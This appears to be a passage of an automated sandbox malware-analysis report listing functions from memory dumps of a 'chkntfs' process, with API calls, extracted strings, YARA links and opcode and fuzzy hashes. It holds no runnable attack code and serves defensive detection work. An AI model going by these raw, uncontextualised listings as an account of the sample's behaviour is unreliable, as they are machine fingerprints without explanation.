                                                    Function 00599730 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00599775
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: 87bc4f35b800b52134ebcab5993ebff53d8483eb209884a6c05680983a10ba2b
                                                    • Instruction ID: bf670192de3f5090704386a20cecf50caadd0a02d73e848c8f3d8285a1fc1152
                                                    • Opcode Fuzzy Hash: 87bc4f35b800b52134ebcab5993ebff53d8483eb209884a6c05680983a10ba2b
                                                    • Instruction Fuzzy Hash: A6F0307334461536E62066E99C46FD7AA5CDFC1B61F140025F60CEA281D995B40142A9
                                                    Function 0059972D Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 00599775
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: a699565756dadf86072e4c4c48ebc474c400ce7b83b7d70ccebef3276c06359a
                                                    • Instruction ID: 4efa6a9beeed31896456a486f0a787f15c3eb1ab16fdac2cab479f633f27166b
                                                    • Opcode Fuzzy Hash: a699565756dadf86072e4c4c48ebc474c400ce7b83b7d70ccebef3276c06359a
                                                    • Instruction Fuzzy Hash: 68F0657228470137E73066998C47FD76A9CEFC5760F100019F61CEB2C1D9E5B80146E9
                                                    Function 005A7D90 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,000004D8,00000000), ref: 005A7DBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_590000_chkntfs.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 23764e6691608a60f71a095d077e4e5176470ac43fd5b7c0c77dcafdc43a0e0c
                                                    • Instruction ID: 8d15b33fe138af0500446cf69cd6ebd9a2dcca3ebdca715cb211abc6a6fa751c
                                                    • Opcode Fuzzy Hash: 23764e6691608a60f71a095d077e4e5176470ac43fd5b7c0c77dcafdc43a0e0c
                                                    • Instruction Fuzzy Hash: D6E086B52442082BFB246AB8DC46FBA375C9F8DB24F684A60F95CDB2C2E978F9014154
                                                    Function 04812C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c1ebcd91697e6ec597487739e0b7cacb9ee901ac6c3457240905d7a6b139ce42
                                                    • Instruction ID: 7e764c6177a3d4bd5a5a734dc3f89cf84f139699512b69938ec2a7ffb63a7d62
                                                    • Opcode Fuzzy Hash: c1ebcd91697e6ec597487739e0b7cacb9ee901ac6c3457240905d7a6b139ce42
                                                    • Instruction Fuzzy Hash: 30B09B719015D5DAFF11F760470971779046BD0705F15C662D3035642E4738D1D5E176

                                                    Non-executed Functions

                                                    Function 045FB8B0 Relevance: 57.7, Strings: 46, Instructions: 217COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3705710135.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_45f0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-3754132690
                                                    • Opcode ID: 0c86c38a4f3a43c27c92f116c56be033f41a85a814bd70f5b0f2e54390311a59
                                                    • Instruction ID: 0d9926af6b9090b42b3bd50659b2ee69cd648b247c6adcfc8ad03736cae360c9
                                                    • Opcode Fuzzy Hash: 0c86c38a4f3a43c27c92f116c56be033f41a85a814bd70f5b0f2e54390311a59
                                                    • Instruction Fuzzy Hash: 46916FF04082988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905DB85
                                                    Function 04812890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 4a6026f03f0d1975bc46cf3104855d7d17728230d4729921a07fc842313e83db
                                                    • Instruction ID: 825ac9a9e79a14e658d3278236e1974a272a01fd25bc249cd6529a7b27f2b5f2
                                                    • Opcode Fuzzy Hash: 4a6026f03f0d1975bc46cf3104855d7d17728230d4729921a07fc842313e83db
                                                    • Instruction Fuzzy Hash: F551FBB5A0011ABFDB15DF9C898097EF7BCBB483047108B6AE495E7641E274FE509BE0
                                                    Function 04882410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: bd0b1fc121aeea563fc8a1598b6a951993cb721062d9df7654bc70ec5603aa48
                                                    • Instruction ID: 8a3037357e20d551140cd934f819634c7e4a1cbb1656317c45f6bbe79d81a7b6
                                                    • Opcode Fuzzy Hash: bd0b1fc121aeea563fc8a1598b6a951993cb721062d9df7654bc70ec5603aa48
                                                    • Instruction Fuzzy Hash: D65117B5A40645AFDB30EF9CC99087FB7F8EF44204B408E9DE496D3641E6B4FA408760
                                                    Function 045F2DF1 Relevance: 15.1, Strings: 12, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3705710135.00000000045F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_45f0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !#-h$$$)g$'$,'?;$,-&<$0~|s$ryyf$sh:>$xah$$}fxh$~f{s$~|sh
                                                    • API String ID: 0-48033457
                                                    • Opcode ID: 2c3c23f50cc2cc54081d7edd4b98c83917929f90c478b1e8a6e8e2f1176f4a63
                                                    • Instruction ID: 6f57d3c185485f7a913a78386c7b83d1704eaf11984e03ea3299426a5d1b33c0
                                                    • Opcode Fuzzy Hash: 2c3c23f50cc2cc54081d7edd4b98c83917929f90c478b1e8a6e8e2f1176f4a63
                                                    • Instruction Fuzzy Hash: F92186B081071C8FCF05DFC9E8812ACBBB0FB04344FA05258D615AF266CB345A81CF8A
                                                    Function 04807630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048446FC
                                                    • Execute=1, xrefs: 04844713
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04844787
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04844655
                                                    • ExecuteOptions, xrefs: 048446A0
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04844725
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04844742
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 718a9f5bffc6e837b33446dc9c5505d8cb13f45e35a5f1508da46e76764818a4
                                                    • Instruction ID: 777b0ac6ab9ebbd3c8610c0717669fd123160955e45108f099e507c3095fb5a4
                                                    • Opcode Fuzzy Hash: 718a9f5bffc6e837b33446dc9c5505d8cb13f45e35a5f1508da46e76764818a4
                                                    • Instruction Fuzzy Hash: 33513A7160020D6AEF50AAA8DC95BB933A8EF04748F004AA9E505E71D0E770BE45CF51
                                                    Function 048A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction ID: 7637ea195117295bd84bec10a97214bb0f7a65c9211299818d0dc4a16c9455c9
                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction Fuzzy Hash: 6B020471508341AFE305CF18C490A6BBBE5EFC8714F148E2DB9899B264EBB1E915CB52
                                                    Function 0481B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 311713681127d55307db7a2dfba00bb3b7eaed8f00b4c5589e84441d3d97ba2f
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 4181BF70E052498FEF248F68C8517EEBBA9AF55750F184F1BD851E72B0D734B8408B61
                                                    Function 048820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: fc9863807b7092962bd768208fe441c5bd9d686f05cb2898c776662da1c28251
                                                    • Instruction ID: da7ee401be9384f88a22c1069bff5fb6b259a3185831184246fcfd31bc0a89c3
                                                    • Opcode Fuzzy Hash: fc9863807b7092962bd768208fe441c5bd9d686f05cb2898c776662da1c28251
                                                    • Instruction Fuzzy Hash: A521657AA00119ABDB10EFB9DC40AEE7BFCEF44744F54065AE905E3200E770F9118BA1
                                                    Function 047FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048402E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048402BD
                                                    • RTL: Re-Waiting, xrefs: 0484031E
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 21634d61a3d3b5606e4300f43f55d07ebf25640a87dac39065546afb41495f8c
                                                    • Instruction ID: 4c3782dc27dbf201f1d260a6a957a2d67619fae16e4732f5b5c6bb423ad5be70
                                                    • Opcode Fuzzy Hash: 21634d61a3d3b5606e4300f43f55d07ebf25640a87dac39065546afb41495f8c
                                                    • Instruction Fuzzy Hash: F9E1AE706047459FD725CF28C884B2AB7E4AB89718F140A5EF6A5CB3E0EB74F844CB52
                                                    Function 0480BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 04847B8E
                                                    • RTL: Re-Waiting, xrefs: 04847BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04847B7F
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: ab2141bf535eb43637b0030a1a824acb08707638cd35ca2647cd5991f15c2590
                                                    • Instruction ID: d22f8e1d596d340979539e2ca376c5312166d913c4d89ca3df1ae91314758f9c
                                                    • Opcode Fuzzy Hash: ab2141bf535eb43637b0030a1a824acb08707638cd35ca2647cd5991f15c2590
                                                    • Instruction Fuzzy Hash: 9941ED317017069FD724DE29CD40B6AB7E5EB88714F004F2DE99AEB290DB70F8458B92
                                                    Function 0480B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0484728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 048472A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04847294
                                                    • RTL: Re-Waiting, xrefs: 048472C1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 5b4f41b14f0395ef5c4735fa652205505a04ecf7db130a93fe4475f4c55badd8
                                                    • Instruction ID: cd9b905636022055aa6bb43668806021aee55bfc0f68b65f56ed9c8a07c9e2ae
                                                    • Opcode Fuzzy Hash: 5b4f41b14f0395ef5c4735fa652205505a04ecf7db130a93fe4475f4c55badd8
                                                    • Instruction Fuzzy Hash: BC41107170061AAFD720DE68CC41B66B7A5FB84718F104F19FA56EB680DB60F8428BD2
                                                    Function 04882300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: f5d62f779be9b9893652d27ac7113d4838b694a605696e90aa0def9ec3b97bd0
                                                    • Instruction ID: d9acf053aa10d35b92e2d69f3594c78670868e4b90ffc6f59b0407da318c82db
                                                    • Opcode Fuzzy Hash: f5d62f779be9b9893652d27ac7113d4838b694a605696e90aa0def9ec3b97bd0
                                                    • Instruction Fuzzy Hash: C4318B766001199FDB20DE2CCD50BEEB7F8EF44714F844A9AE849E3200EB30BA448F61
                                                    Function 04817D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: b620d45d1a887b8294cc72f3a2b06c7c13bb1966012c43845088fc5bbf4832c6
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 50919171E0021A9BDB24DE69C881ABFB7E9AF44724F144F1FEC55E72E0E770A9408761
                                                    Function 047D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: true
                                                    • Associated: 0000000E.00000002.3706103810.00000000048C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.00000000048CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_47a0000_chkntfs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: a790510eb277882791d6407faca28dae2d2b0d4520696e3b8281074e7c692c2f
                                                    • Instruction ID: c5aa6d7c078e5bb6e2813a0da6e7137393c4e1025998ef3aa8855a633778ad66
                                                    • Opcode Fuzzy Hash: a790510eb277882791d6407faca28dae2d2b0d4520696e3b8281074e7c692c2f
                                                    • Instruction Fuzzy Hash: 89810DB1D002699BDB31DF54CC45BEAB7B4AF48714F0446EAEA19B7240E7746E84CFA0